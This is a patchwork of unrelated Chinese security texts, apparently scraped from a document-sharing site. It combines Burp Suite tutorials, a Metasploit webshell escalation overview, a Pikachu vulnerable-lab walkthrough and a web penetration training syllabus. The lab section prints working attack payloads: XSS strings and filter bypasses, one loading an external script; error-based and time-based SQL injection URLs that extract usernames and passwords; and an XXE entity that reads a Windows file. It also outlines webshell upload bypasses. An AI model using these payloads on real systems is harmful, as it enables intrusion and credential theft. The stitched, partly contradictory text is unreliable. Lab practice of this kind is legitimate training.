(零基础)手工注入+burpsuite拿webshell
- 格式:docx
- 大小:4.10 MB
- 文档页数:20
Burp Suite--- Intruder小技巧作者:小冰50421961[AT] QQ [Dot] com0x00 题外话最近朋友送了我少女时代日本巡回演唱会蓝光高清限量版,太激动了!为此表示感谢,所以才有了下文。
O(∩_∩)O哈哈~废话不多说,进入正题。
0x01 Intruder—暴力破解安装要求:Java环境下载地址: /j2se/downloads.htmlBurp Suite下载地址: /burp/download.html入门:安装完成后可以双击可执行的JAR文件,如果不工作,你可以运行在命令提示符或终端输入。
命令: Java –jar burpsuite_v1.4.jar上篇文章对于burp的基本设置,已经说了很明了了,在这我就只提下就行咯。
(*^__^*) 嘻嘻…… 配置过程如下:代理端口配置如下图:浏览器的配置如下图:然后把拦截(intercept)功能关闭,因为我们这里不需要进行数据拦截目标:登陆页面思路过程:寻找登陆错误关键字—进行暴力破解打开我们的目标如下图:我们随意填写账户密码进行登陆,以此获取到登陆的错误信息如下图:然后返回burp看提交和返回数据信息如下图:发现我们浏览器所爆出的错误信息在数据包返回的页面中根本无法找到。
我想这应该是要pro 版本 才能查看到数据吧 O(∩_∩)O 哈哈~ 开个玩笑!其实细心的童鞋会发现我上图我所标注的地方,HTTP 状态码302—重定向到另外一个url,我们看看第二个url 返回的内容如下图:这样有办法继续暴力破解么?我们看看返回的数据:大家仔细看下服务器返回响应头会发现点端倪Location: login.php Location响应头用于重定向接收者到一个新URI地址。
嘿嘿.那现在的思路很明显咯。
找到密码验证正确所跳转到的页面文件,随后进行暴力破解。
这里为了演示所以我就直接用正确的用户密码登陆对比下两次的数据有什么不同的地方。
burpsuite操作手册Burp Suite是一个强大的网络应用程序安全测试工具,以下是一些Burp Suite的基本操作步骤:1. 打开Burp Suite并启动一个新的扫描项目。
2. 在“Proxy”标签页中,配置你的代理设置。
确保你的浏览器已设置为使用Burp Suite作为代理。
3. 在“Proxy”标签页中,找到“Intercept is on”部分,并单击“Intercept is on”按钮以开始拦截流量。
4. 打开一个浏览器,并访问你想要测试的网站。
此时,你的所有请求将被Burp Suite拦截。
5. 在Burp Suite中,你可以查看请求和响应的详细信息。
你可以在“Proxy”标签页中的“HTTP history”部分查看请求和响应的详细信息。
6. 在“Proxy”标签页中,找到“Intercept is on”部分,并单击“Intercept is off”按钮以停止拦截流量。
7. 在“Target”标签页中,找到你想要测试的网站或应用程序,并单击“Add to target”按钮将其添加到目标列表中。
8. 在“Scanner”标签页中,选择你想要运行的扫描类型(例如,Active Scan)。
然后单击“Start Scan”按钮开始扫描。
9. 扫描完成后,你可以在“Results”标签页中查看扫描结果。
10. 在“Results”标签页中,你可以查看漏洞和相关信息的详细信息。
如果你发现任何漏洞,你可以使用Burp Suite提供的工具来测试和验证漏洞。
这只是Burp Suite的一些基本操作步骤,它还有许多其他功能和选项可供探索。
建议查阅Burp Suite的官方文档或相关教程以获取更深入的了解。
webshell msf 提权方法
Webshell是一种可以用来执行命令的脚本,通常用于攻击者在受害者的服务器上执行恶意操作。
MSF(Metasploit Framework)是一种流行的渗透测试工具,可以用于执行各种攻击和提权操作。
以下是使用MSF进行Webshell提权的一般步骤:
1. 获取Webshell:首先,攻击者需要将Webshell上传到受害者的服务器上。
这可以通过多种方式完成,例如通过文件上传漏洞、利用Web应用程序漏洞或其他漏洞。
2. 扫描目标:一旦Webshell上传成功,攻击者可以使用MSF的扫描器来扫描目标服务器的漏洞和弱点。
这可以帮助攻击者确定哪些用户和系统具有潜在的提权机会。
3. 执行攻击:一旦攻击者确定了潜在的提权机会,他们可以使用MSF的各种攻击模块来尝试提权。
这可能包括利用系统漏洞、使用缓冲区溢出攻击、执行命令注入等。
4. 获取权限:如果攻击成功,攻击者将获得对目标服务器的权限。
这可能包括管理员权限或其他高权限。
需要注意的是,这些步骤只是一个一般性的概述,并且实际情况可能因目标系统和环境而异。
此外,使用这些技术进行非法活动是非法的,并且可能导致严重的法律后果。
因此,建议仅在合法和授权的情况下使用这些技术。
burpsuite使用教程Burp Suite 是一款功能强大的网络安全测试工具。
它提供了多个模块,用于执行不同类型的安全测试,包括漏洞扫描、渗透测试、应用程序安全测试等。
以下是使用 Burp Suite 的基本教程。
1. 下载和安装:首先,从官方网站上下载 Burp Suite 的安装包,并按照安装向导的指示完成安装。
2. 配置代理:打开 Burp Suite,进入“Proxy”选项卡,选择“Options”子选项卡。
在这里,你可以配置 Burp Suite 的代理设置。
默认情况下,Burp Suite 监听在 127.0.0.1 的 8080 端口上。
如果你需要修改代理设置,可以在这里进行更改。
3. 设置浏览器代理:打开你常用的浏览器,找到代理设置选项,并将代理地址设置为 127.0.0.1,端口设置为 8080。
4. 拦截请求和响应:在 Burp Suite 的“Proxy”选项卡中,点击“Intercept is on”按钮,以开启请求和响应的拦截功能。
当拦截功能开启后,所有的请求和响应都会被拦截下来,并显示在“Intercept”子选项卡中。
你可以在这里查看和修改请求和响应的内容。
5. 发送请求:在浏览器中访问你要测试的网址时,Burp Suite将会拦截这个请求。
你可以选择拦截还是放行这个请求。
如果你选择放行,那么请求将会继续正常的发送到目标服务器。
6. 扫描和检测漏洞:Burp Suite 的“Scanner”模块提供了多个自动化漏洞扫描工具,可以扫描目标应用程序中的漏洞。
你可以选择需要扫描的目标,并开始扫描过程。
完成后,你可以查看漏洞报告,以获取详细的扫描结果。
7. 拦截和修改请求:在“Proxy”选项卡的“Intercept”子选项卡中,你可以选择拦截特定的请求,并进行修改。
你可以修改请求的参数、头部信息等。
修改后的请求将会在发送给目标服务器之前生效。
8. 破解会话:Burp Suite 提供了一个名为“Burp Intruder”的工具,用于破解会话密钥和密码。
使用burp抓包的步骤使用Burp抓包的步骤Burp Suite是一款用于进行Web应用程序安全测试的工具,其中的Burp Proxy模块可以用来拦截和修改HTTP/HTTPS请求和响应。
使用Burp抓包可以帮助我们分析应用程序的通信过程,发现潜在的安全漏洞。
下面将介绍使用Burp抓包的步骤。
步骤一:配置浏览器代理在使用Burp抓包之前,需要将浏览器的代理设置为Burp的代理地址和端口。
首先打开Burp Suite,然后点击Proxy选项卡,找到Proxy Listener部分,将监听端口设置为一个未被占用的端口,例如8888。
接着打开浏览器的设置,找到代理设置项,将代理地址设置为127.0.0.1,端口设置为8888。
步骤二:启用Burp Proxy在Burp Suite的Proxy选项卡中,默认情况下,Intercept功能是被禁用的,需要手动启用。
点击Intercept子选项卡,然后点击Intercept is on按钮,使其变为Intercept is off。
这样就启用了Intercept功能,Burp会拦截所有经过浏览器的请求和响应。
步骤三:开始抓包现在可以开始抓包了。
在浏览器中输入目标网址,并访问该网址。
Burp会拦截该请求,并在Proxy历史记录中显示。
点击Proxy选项卡的Intercept子选项卡,可以看到拦截的请求和响应。
步骤四:查看请求和响应在Proxy历史记录中,可以查看每个请求和响应的详细信息。
点击某个请求或响应,可以在右侧的详细信息面板中查看该请求或响应的各个字段,包括协议、主机、路径、参数等。
可以通过展开和折叠不同的字段,查看更详细的信息。
步骤五:修改请求和响应Burp还可以用来修改请求和响应。
在Proxy历史记录中,选中某个请求或响应,然后点击右键,选择“Do Intercept”或“Do Intercept Response”,即可进入Intercept界面。
pikachu_通关速记五⼀假期,因为⾃⼰太懒了不想出门,就记录⼀下⾃⼰的打靶经历密码爆破1.1表单爆破Burpsuite抓包直接爆1.2验证码绕过(on server)验证码在服务端只验证⼀次,那么⼿动输⼊验证码后再次爆1.3验证码绕过(on client)验证码只在客户端进⾏验证,并不会发送到服务端,所以抓包的时候直接把验证码去掉再爆1.4绕过token防护这⾥我就得向服务器获取到token值,然后递归和字典⼀起爆获取到的第⼀个token值,需要⼿动粘贴填⼀下,另外重定向哪⾥也需要设成⼀直XSS注⼊反射型(get)直接再url中写⼊payload<script>alert('1')</script>反射型(post)在搜素框中写⼊payload,点击时触发<h onclick=alert('1')>1<h>存储型留⾔板中留个图⽚,不加源,同样是点击触发<img src="" onclick=alert('1')>DOM型直接单引号闭合跃出,加上点击触发' onclick="alert('xss')">DOM_XSS-X同理盲打不管3721,尝试就对了绕过滤第⼀种,⼤⼩写<ScRipt>alert(1)</ScRIpT>第⼆种,双重尖括号双倍快乐<<SCRIPT>alert("XSS");//<</SCRIPT>第三种,没有标签绕过某些浏览器中不需要加⼊常规XSSpayload中的”>”部分.例如firefox会为你⾮常体贴的安全闭合HTML标签,并且加⼊闭合标签!<SCRIPT SRC=http://xss.rocks/xss.js?< B >其他绕过⽅式/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0D%0A//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3ehtmlspecialchars实体转换使⽤Javascript伪协议javascript:alert(document.domain)href输出同样可以使⽤伪协议输出javascript:alert(document.domain)js输出闭合,输出CSRF跨站伪造请求GET型直接存在于URL中,实现起来很简单post型POST注⼊稍微⿇烦⼀点需要先截包,然后使⽤burpsuite⽣成⼀个表单,挂在服务器⾥,让受害者点击tokenSQL注⼊数字型注⼊布尔判断寻找注⼊点直接order by,猜出字段数查找显⽰位查看数据库版本和当前库名根据得到的库名得到pikachu中所有表名查找users表中的所有字段信息然后直接查找pikachu库中users表的username和password信息同理可以查找数据库root⽤户的密码解密字符型注⼊单引号判断注⼊点闭合单引号判断字段数使⽤updatexml报错注⼊得到pikachu库下的表名http://192.168.1.11/pikachu/vul/sqli/sqli_str.php?name=lili' union select 1,updatexml(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema='pikachu'),0x7e),1) -- &submit=查询拿到users表的字段信息http://192.168.1.11/pikachu/vul/sqli/sqli_str.php?name=lili' union select 1,updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1)-- &submit=查询拿users表的具体内容http://192.168.1.11/pikachu/vul/sqli/sqli_str.php?name=lili' union select 1,updatexml(1,concat(0x7e,(SELECT distinct concat(0x23,username,0x3a,password,0x23) FROM users limit 1,1),0x7e),1) -- &submit=查询搜索型注⼊可以发现单引号出现报错,注释掉后回显正常,那么就可以选择联合注⼊或者是报错注⼊,这⾥就不占篇幅了不知名类型注⼊可以看见他构造的闭合有点奇怪,是'),有的情况下还有双引号、中括号等奇葩⽅式,但是只要找到注⼊点就基本结束了,注⼊⽅法参考上⾯的联合和报错insert、update、delete注⼊加⼊万能的单引号再次使⽤报错延时注⼊(布尔注⼊与延时同理不做演⽰)payload如下http://192.168.1.7/pikachu/vul/sqli/sqli_blind_b.phpname=lili' and sleep(20)--+略宽字节注⼊带⼊%82复活单引号接下来就简单了,和上⾯⼀样命令执⾏远程命令执⾏例如在执⾏ping命令后加管道符(或&&)执⾏systeminfo获取系统详细信息,远程代码执⾏例如输⼊phpinfo();⽂件包含本地⽂件包含⼀般配合⽬录遍历使⽤,例如读取服务器的hosts⽂件远程⽂件包含远端服务器准备docker快速开⼀个lnmp服务root@linux:~# docker run -itd -p 12345:80 raesene/bwapp84ea4667fa6e76be69cc1468a70d485fb198554b5bb4a38b369030666e0a95d5包含远端⽂件⽂件下载⽬录遍历下载个记事本⽂件上传客户端检查将webshell上传时改成图⽚格式,截包后改成php格式服务端检查不⽤改成图⽚格式,直接上传webshell,截包将Content-Type声明为 image/pngwebshell连接图像内容检查这⾥使⽤了getimagesize() 函数获取图像⼤⼩及⽂件头是否是真实的图⽚,所以需要将webshell写⼊真实的图⽚来绕过检查webshell连接这⾥的shell是放在图⽚⾥的,所以需要让nginx错误的解析图⽚释放webshell越权⽔平越权直接替换⽤户查询即可垂直越权admin登陆后进⼊添加⽤户复制URL退出登陆,登陆pikachu进⼊admin的管理界⾯添加⼀个⽤户lisi⽬录遍历敏感信息泄露直接F12查看代码PHP反序列化XML注⼊payload<?xml version = "1.0"?><!DOCTYPE ANY [<!ENTITY f SYSTEM "file:///C://Windows//win.ini">]><x>&f;</x>URL重定向SSRFcurl_exec()函数file_get_contents()函数。
学习使用BurpSuite进行Web应用安全测试第一章:BurpSuite简介BurpSuite是一款功能强大的集成式渗透测试工具,广泛应用于Web应用程序漏洞扫描和安全评估。
它由PortSwigger开发,为渗透测试人员提供了一整套工具和功能,帮助他们发现、利用和修复Web应用程序中的漏洞。
BurpSuite的核心功能包括代理服务器、漏洞扫描器、爬虫和拦截器等。
第二章:安装和配置BurpSuite在使用BurpSuite之前,首先需要进行安装和配置。
BurpSuite支持多个操作系统,包括Windows、Linux和MacOS。
根据自己的系统选择下载对应的安装包,并按照步骤进行安装。
安装完成后,打开BurpSuite,进入配置界面。
配置界面包括代理、目标、Spider和Scanner等选项,根据需要进行相应的设置。
第三章:使用BurpSuite代理BurpSuite的代理功能是其最重要的部分之一,可以通过拦截和修改HTTP通信来分析和调试Web应用程序。
在使用代理之前,需要将浏览器的代理设置为BurpSuite的监听地址和端口。
然后打开BurpSuite的代理界面,点击“Start”按钮启动代理服务器。
此时,所有浏览器发出的HTTP请求都会被BurpSuite代理拦截并显示在代理历史中。
通过代理历史,可以查看请求和响应的详细信息,包括参数、报文头和Cookie等。
第四章:使用BurpSuite爬虫BurpSuite的爬虫功能可以模拟浏览器访问网站,并自动发现链接和目录。
在爬虫界面中,可以设置起始URL和最大爬取深度等参数。
点击“Start”按钮,BurpSuite会自动开始爬取网站,并将发现的链接保存在Site Map中。
通过查看Site Map,可以得到网站的结构以及存在的漏洞点。
此外,爬虫还可以自动提交表单、检测反爬机制和识别Session等。
第五章:使用BurpSuite漏洞扫描器BurpSuite的漏洞扫描器是一种自动化工具,用于检测常见的Web应用程序漏洞,如SQL注入、XSS跨站脚本攻击和任意文件上传等。
burp 使用方法Burp 使用方法Burp Suite 是一款非常有效的 Web 安全渗透测试工具,它由三个部分组成:Burp Proxy、Burp Scanner 和 Burp Intruder。
它可以捕获和模拟 Web 浏览器的行为,以及检测及攻击网站组件和 Web 漏洞。
本文将介绍 Burp Suite 工具的使用方法。
一、Burp ProxyBurp Proxy 是 Burp Suite 中最重要的工具,它能够拦截 HTTP 和 HTTPS 流量并且将其中的数据包进行分析,模拟浏览器行为,修改数据包内容,发起攻击,截获数据包等操作。
1、首先,打开 Burp Suite,点击“Proxy”标签页,再点击“Options”,在新弹出的窗口中,选择“Proxy Listeners”,再点击“Add”按钮,在新弹出的窗口中,将“Bind to port”字段设置为 8080,将“All interfaces”复选框勾选,最后点击“OK”按钮。
2、接着,点击“Proxy”标签页,再点击“Intercept”中间的“Intercept is off”按钮,将其切换到“Intercept is on”,此时,浏览器访问的所有数据包都会被拦截。
3、然后,点击“Proxy”标签页,选择“History”,可以看到所有被拦截的数据包,点击每个数据包,可以看到请求和响应的信息,点击“Raw”标签页,可以看到原始的数据包。
4、最后,在“History”窗口中,可以选择一些数据包,然后点击右键,可以执行多种操作,其中常用的有:查看请求头、查看响应头、查看原始请求内容、查看原始响应内容、显示 Cookie 封包等。
二、Burp ScannerBurp Scanner 是 Burp Suite 中负责漏洞扫描的工具,它可以识别网站中可能存在的漏洞,可以为安全测试提供极大的帮助。
1、首先,点击“Target”标签页,点击右上角的“Add to scope”按钮,将需要扫描的网站添加到扫描范围。
Burp Suite是一款用于Web应用程序渗透测试的强大工具,它允许安全专业人员评估Web 应用程序的安全性。
在Kali Linux中使用Burp Suite通常包括以下步骤:步骤1:安装Burp Suite如果你还没有在Kali Linux中安装Burp Suite,你可以通过以下步骤进行安装:sudo apt updatesudo apt install burpsuite步骤2:启动Burp Suite在终端中运行以下命令启动Burp Suite:burpsuite步骤3:配置代理打开Burp Suite后,进入"Proxy" 选项卡。
在"Proxy" 选项卡中,确保"Intercept is On" 处于启用状态。
步骤4:配置浏览器代理打开你的Web浏览器,进入设置或选项。
配置浏览器使用Burp Suite作为代理。
默认Burp Suite的代理监听地址是127.0.0.1,端口是8080。
步骤5:捕获请求在Burp Suite的"Proxy" 选项卡下,查看通过代理的HTTP请求。
如果"Intercept" 处于启用状态,Burp Suite将拦截请求,你可以选择是否修改请求后再发送到服务器。
步骤6:使用Intruder、Repeater等功能Burp Suite提供了多个功能,用于进一步分析和测试Web应用程序。
以下是一些常见功能:Intruder:用于执行自动化攻击,例如暴力破解和参数爆破攻击。
Repeater:允许你对单个请求进行手动修改和重新发送,用于测试特定的请求和响应。
Scanner:用于自动扫描Web应用程序中的漏洞。
Sequencer:用于分析随机数生成器的质量,通常用于破解会话令牌。
步骤7:保存和分析结果在进行渗透测试时,确保记录所有的请求和响应,以及Burp Suite工具生成的任何报告。
burp使用方法
Burp Suite是一款流行的渗透测试工具,可以帮助渗透测试人员在测试应用程序时发现漏洞并进行漏洞利用。
本文将介绍Burp Suite的使用方法,包括以下内容:
1. 安装Burp Suite
在官网下载Burp Suite安装包,安装到本地电脑中。
2. 配置代理
启动Burp Suite,设置代理,打开浏览器,将代理服务器地址和端口设置为Burp Suite的监听地址和端口,这样所有经过该浏览器的请求都会被Burp Suite拦截并进行分析。
3. 探测漏洞
使用Burp Suite的漏洞扫描工具和手动测试工具,对应用程序进行渗透测试。
可以使用Burp Suite的Intruder模块对参数进行暴力破解,使用Repeater模块进行请求的重放和修改。
4. 分析报告
当测试完成后,可以使用Burp Suite的报告功能生成漏洞报告。
报告中可以包含发现的漏洞、影响和建议修复方法。
5. 扩展Burp Suite
Burp Suite可以扩展,通过编写插件来增强其功能。
可以使用Java编写插件并将其加载到Burp Suite中。
总之,使用Burp Suite进行渗透测试可以帮助发现应用程序中存在的漏洞并提供修复建议。
因此,熟练掌握Burp Suite的使用方
法对于渗透测试人员来说是非常重要的。
burpsuite用法一、什么是b u r p s u i t e?B u rp su it e是一款广泛使用的渗透测试工具,用于检测和利用w eb应用程序的安全漏洞。
它提供了强大的功能,包括代理服务器、扫描器、拦截器等,帮助安全专业人员发现和修复应用程序中的漏洞。
二、基本使用1.安装和启动在官方网站下载B urp s ui te并安装完成之后,双击运行B urp s ui te 图标即可启动该工具。
2.配置代理在使用B ur ps ui te之前,需要配置浏览器的代理设置,将其指向B u rp su it e的代理服务器。
一般来说,配置代理的端口默认为8080,可以根据实际需要进行调整。
3.拦截和修改数据B u rp su it e作为中间人代理,可以拦截H TT P/HT TP S请求和响应。
通过在Bu rp su it e的P r ox y选项卡中启用拦截器,可以实时查看、修改和重新发送请求。
这对于理解应用程序如何与服务器通信,以及找出潜在的漏洞非常有帮助。
4.主动扫描B u rp su it e还提供了强大的主动扫描功能,可以自动发现应用程序中的漏洞。
通过在B urp s ui te的S ca nn er选项卡中设置扫描目标并进行配置,可以进行漏洞扫描,并生成详细的报告。
三、高级使用1.利用漏洞根据扫描结果,B urp s ui te可以发现各类漏洞,如S QL注入、跨站脚本(XS S)等。
通过分析漏洞细节,可以对应用程序进行渗透测试,验证其安全性并提供修复建议。
2.编写自定义插件B u rp su it e提供了强大的插件支持,可以通过编写插件来扩展其功能。
根据需求,可以编写自定义的插件来自动化常见的渗透测试任务,提高工作效率。
3.与其他工具集成B u rp su it e可以与其他安全工具集成,如M et as pl oi t、Nes s us等。
通过与这些工具的集成,可以更全面地分析和检测应用程序中的漏洞。
培训方案1、对学生知识的要求对Windows 、Linux 及 SQL 语句有一定的了解即可2、学生的知识能力提高本课程重点培训学生的 Web 渗透测试能力,通过 20 天的渗透测试培训,学生可具备以下能力1)、了解Web 服务器的工作过程及原理2)、了解协议3)、学会渗透测试前踩点技能4)、学会使用常见的渗透测试工具如burpsuite 、 SQLmap 等等5)、了解常见的系统攻击过程及手段6)、学会常见的系统攻击方法7)、学会Web 服务器的信息获取8)、学会IIS、 Apache 、tomcat、 Weblogic 等常见中间件的漏洞利用方式及加固方法9)、深入了解各类SQL 注入漏洞的原理、攻击手段及加固措施10)、掌握上传漏洞、命令执行漏洞、XSS 漏洞等常见Web 漏洞的利用方式及技巧11)、掌握各类提权方法12)、掌握各类第三方插件/程度的漏洞利用方法3、考试及颁发证书暂无,可有4、培训案例分析安云科技针对学生每年举办两次定期培训,现已经举办了 4 次针对学生的培训,同时,受邀给XX工学院、XX职业技术学院、XX警察学院等学校的老师进行培训关于提升就业问题:现阶段,国家对信息安全的重视及网络安全行业的火爆,但人才短缺,安全行业的薪资也普遍高于其它行业,据调查,目前XX省内所有安全公司都面临人员不足的情况5、培训课程时间授课内安排分类容章节实验Web安全第一节 : 服务器是如何被入简介侵的第二节:如何更好的学习 web安全1.发起请求第一第一节:协议解析2. 协议详解3. 模拟请求天4.和 s协议区别Web安全1.burpsuit初体验简介第二节:截取请求 2.fiddler介绍3.winsock expert实验第三节:应用:黑帽 SEO之搜索引擎劫持第一节: google hack 1. 搜集子域名2. 搜集 web 信息第二基础信息刺1. 安装 nmap天篇第二节: nmap详细讲解 2. 探测主机信息探3.namp 脚本引擎第三节: dirbuster 介绍第四节:指纹识别1.target2.spider第一节: burpsuit 3.scanner4.Intruder5. 辅助模块第三漏洞扫 1.wvs 向导扫描天描第二节: wvs 介绍 2.web 扫描服务3.wvs 小工具1. 使用 appscan 扫描第三节: appscan2.处理结果3.appscan 辅助脚本第四节: openvas 1.openvas 扫描第一节:密码破解 密码破解实验第二节:系统提权系统提权实验 第四 系统攻 第三节:后门程序 后门程序实验天击第四节:文件隐藏 文件隐藏实验第五节:清理痕迹 清理痕迹实验第六节:渗透测试系统 第一节: netbios 枚举 NetBIOS 枚举实验 安全第二节: snmp 枚举 Snmp 枚举实验系统枚第三节: mac 攻击第五 第四节: DHCP 攻击举和嗅 天第五节: arp 攻击探1. cain 工具的使用第六节:嗅探工具2. Ettercap 工具的使用第一章: 第一节: web 服务器 bannerweb 服务 获取(全部中间件)实验一 :web 服务器 banner 获取器的 banner获取与 第二节: web 服务器 banner隐藏 隐藏(全部中间件) 实验二 :web 服务器 banner 隐藏第二章: 第一节:目录遍历漏洞利用目录遍 (全部)实验一:目录遍历漏洞利用历漏洞第二节:目录遍历漏洞修复第六 及修复(全部)实验二:目标遍历漏洞修复实验一: IIS6.0 目录解析漏洞 天第一节: IIS 解析漏洞实验二: IIS6.0 文件解析漏洞第三章: 第二节: php cgi 解析漏洞解析漏(nginx )实验三: PHP CGI 解析漏洞 洞第三节: apache 解析漏洞 实验四: apache 解析漏洞第四节: websphere 解析漏洞实验五: websphere 解析漏洞第四章: 第一节: tomcat 部署 war 包实验一: tomcat 部署 war 包木木马并利用马并利用利用中第二节: weblogic 部署 war 实验二: weblogic 部署 war 包 间件弱 包木马并利用木马并利用口令部第三节: oss 部署 war 包实验三:oss 部署 war 包木马署木马木马并利用并利用第五章: 第一节 struts2漏洞详解第七 struts2天漏洞利用 第二节 struts2 漏洞实战struts2 漏洞利用第六章: 第一节 oss invoke接口oss详解invoke接口未授权访第二节 oss invoke接口oss invoke接口未授权访问问利用未授权访问实战利用第七章:第一节 java反序列化漏洞java 反详解oss 部署 shell序列化第二节 java反序列化漏洞漏洞实战weblogic 部署 shell第八章:第一节 IISPUT 上传漏洞多实验一: IISPUT 上传漏洞多种其它种探测方式及利用探测方式及利用第一章:sql 注入第一节:理解 SQL注入的产详解生过程第八sql 注入整型报错注入sql 注入整型报错注入天sql 注入单括号注入报错sql 注入单括号注入报错sql 注入双引号报错注入sql 注入双引号报错注入sql 注入字符型报错注入sql 注入字符型报错注入sql 注入双注入sql 注入双注入第九sql 注入写入读取文件sql 注入写入读取文件sql 注入 bool 注入sql 注入 bool 注入天sql 注入 sleep 注入sql 注入 sleep注入第二章update 注入update 注入sql 注入第八节: sql注入 POST注入实验八: sql注入 POST注入的类型第九节: sql注入 cookie 注入实验九: sql注入 cookie 注入sql 第十节: sql注入实验十: sql注入 header header 注入注入注入第十一节: sql 注入实验十一: sql注入 useragent 第十useragent 注入注入天第十二节: sql 注入 referer实验十二: sql注入 referrer注入注入第三章自动化工具利用第一节: pangolin使用实验一: pangolin 使用第一节: sqlmap 安装以及实验一:利用 sqlmap 的获取有acess 注入注入点的数据库所有数据第四章第二节: mysql 数据库注入实验二: sqlmap 进阶使用指定(整个入侵过程)数据库、操作系统第十sqlmap实验三: sqlmap 进阶使用刷新一天使用第三节: Cookie 注入session 文件实验四: sqlmap 进阶使用 post第四节: post 登陆框注入注入、 -r 接收文件第五节:交互式写 shell 及命令执行伪静态注入一第六节:伪静态注入伪静态注入之中转注入第七节:请求延时延时注入第八节:来吧 Google利用 google进行诸如第九节: sqlmap 进阶使用刷新 session 文件刷新 session注入第十节:绕过 WAF防火墙绕过 waf 注入第十一节: sqlmap 进阶使用指定数据库、操作系统指定相信信息注入第十二节:sqlmap 模板使用,编写第一节 mysql手工注入(php)实验一: mysql 手工注入第五章第二节 mssql手工注入(aspx)实验二: mssql 手工注入手工注第三节 oracle手工注入入(jsp)实验三: oracle手工注入第四节 access手工注入(asp)实验四: access手工注入第一节文件上传漏洞 type实验二文件上传漏洞 type 绕绕过过第一章:第二节文件上传漏洞扩展实验三文件上传漏洞文件名文件上名绕过绕过传漏洞第三节文件上传漏洞 JS 绕过实验四文件上传漏洞 JS 绕过第四节修改头文件第一节本地文件包含之读取第一节本地文件包含敏感文件第二节本地文件包含之包含日志获取 webshell第三节远程文件包含 shell第二章:第四节远程文件包含写 shell第十第五节本地包含配合文件上文件包三天传含漏洞第六节文件包含 PHP封装协第二节远程文件包含议之读取文件第七节文件包含 PHP封装协议之读写文件第八节文件包含 PHP封装协议之命令执行第十第三章:第一节利用数据库备份获实验六利用数据库备份获取四天数据库取 shell shell 备份获取webshell第四章:实验七后台、敏感文件查找多第一节 wwwscan 使用种工具( wwwscan、pk、御剑)后台及使用敏感文第二节 pk 使用件扫描第二节御剑使用第五章:弱口令暴力破第一节利用 burpsuit暴力实验八利用 burpsuit 暴力破解破解弱口令解弱口令第六章:第一节中国菜刀使用实验九大马、小马、菜刀常见的第二节大马使用木马工第三节 udf木马提权具使用简单提权第一节 2003溢出实验十 win2003 、ms09-012 提权 ms08067第二节 2008溢出第十第七章:第三节 linux溢出mysql 提权提权实验五天提权mssql 提权提权实验Oracle 提权提权实验突破 php 安全模式执行命令突破 ASP安全限制执行命令替换启动项提权第八章:第一节远程桌面介绍实验十一开启 33893389 端口开启第二节开启 3389远程开始 3389第九章:第一节反射型 xss第二节存储型 xss实验十五反射型 xss第十xss 类型第三节 DOM型 xss六天第一节绕过过滤一第十章:第二节绕过过滤二xss 字字符绕过第三节绕过过滤三符绕过第四节绕过过滤四第五节绕过过滤五第十一第十章: xss 七天高级利第四节 xss 会话劫持第五节 xss getshell 第六节 xss 蠕虫用第七节 xss 网络钓鱼第八节 Flash XSS第十二第一节 thinkphp命令执行章漏洞详解thinkphp 命令执第二节 thinkphp命令执行行实战thinkphp命令执行第十三第一节 FCKeditor FCKeditor漏洞利用章编辑第二节 eWebEditor eWebEditor 漏洞利用器漏洞第七节 Kindeditor Kindeditor漏洞利用第一节命令执行漏洞示例第十四第二节 php 命令执行php 命令执行命令执行实验章:命令第三节 php 代码执行代码执行实验执行漏第四节 php 动态函数调用第十洞第五节 php 函数代码执行漏八天洞第十五CSRF GET型CSRF GET型实验章:CSRF漏洞CSRF POST型CSRF POST型实验第十六xml 注入xpath 注入章:代码json注入注入参数污染第十七bash 漏洞详解章:bash漏洞bash 漏洞利用bash 漏洞利用实验第十八章:blood blood 心血漏洞第十第一节分析列目录文件和目录九天第二节获取的真实路第十九径章:利用第三节将一句话后门导入phpMyAdmin 渗透第四节获取 WebShell获取 WebShell 实验万能密码万能密码实验第五节导出数据库导出数据库实验第二十天CTF比赛CTF比赛爱人者,人恒爱之;敬人者,人恒敬之;宽以济猛,猛以济宽,政是以和。
Burp Suite使用详解一本文由阿德马翻译自国外网站,请尊重劳动成果,转载注明出处Burp Suite是Web应用程序测试的最佳工具之一,其多种功能可以帮我们执行各种任务.请求的拦截和修改,扫描web应用程序漏洞,以暴力破解登陆表单,执行会话令牌等多种的随机性检查。
本文将做一个Burp Suite完全正的演练,主要讨论它的以下特点.1.代理--Burp Suite带有一个代理,通过默认端口8080上运行,使用这个代理,我们可以截获并修改从客户端到web应用程序的数据包.2.Spider(蜘蛛)--Burp Suite的蜘蛛功能是用来抓取Web应用程序的链接和内容等,它会自动提交登陆表单(通过用户自定义输入)的情况下.Burp Suite的蜘蛛可以爬行扫描出网站上所有的链接,通过对这些链接的详细扫描来发现Web应用程序的漏洞。
3.Scanner(扫描器)--它是用来扫描Web应用程序漏洞的.在测试的过程中可能会出现一些误报。
重要的是要记住,自动扫描器扫描的结果不可能完全100%准确.4.Intruder(入侵)--此功能呢可用语多种用途,如利用漏洞,Web应用程序模糊测试,进行暴力猜解等.5.Repeater(中继器)--此功能用于根据不同的情况修改和发送相同的请求次数并分析.6.Sequencer--此功能主要用来检查Web应用程序提供的会话令牌的随机性.并执行各种测试.7.Decoder(解码)--此功能可用于解码数据找回原来的数据形式,或者进行编码和加密数据.parer--此功能用来执行任意的两个请求,响应或任何其它形式的数据之间的比较.1)Proxy(代理)代理功能使我们能够截获并修改请求.为了拦截请求,并对其进行操作,我们必须通过Burp Suite配置我们的浏览器.一旦在浏览器上设置好之后,就打开Burp Suite,去Proxy项进行Intercept(截断),需要确保intercept is on.打开alerts标签,可以看到代理正运行在8080端口.我们可以在Proxy-->options下来修改这个配置.打开Proxy下的options标签在这里我们可以编辑代理正在监听的端口,甚至添加一个新的代理监听.Burp也有向SSL保护网站提交证书的选项.默认情况下,Burp创建一个自签名的证书之后立即安装."generate CA-signed per-host certificates"选项选中之后Burp的证书功能将生成一个我们能够链接的证书签署的特定主机.在这里我们关心的唯一事情是,当一个用户链接到一个SSL保护的网站时,能后减少网站警告提示的次数.如果我们不选中"listen on loopback interface only"选项,意味着Burp Proxy可以作为一个网络上其它系统的代理。
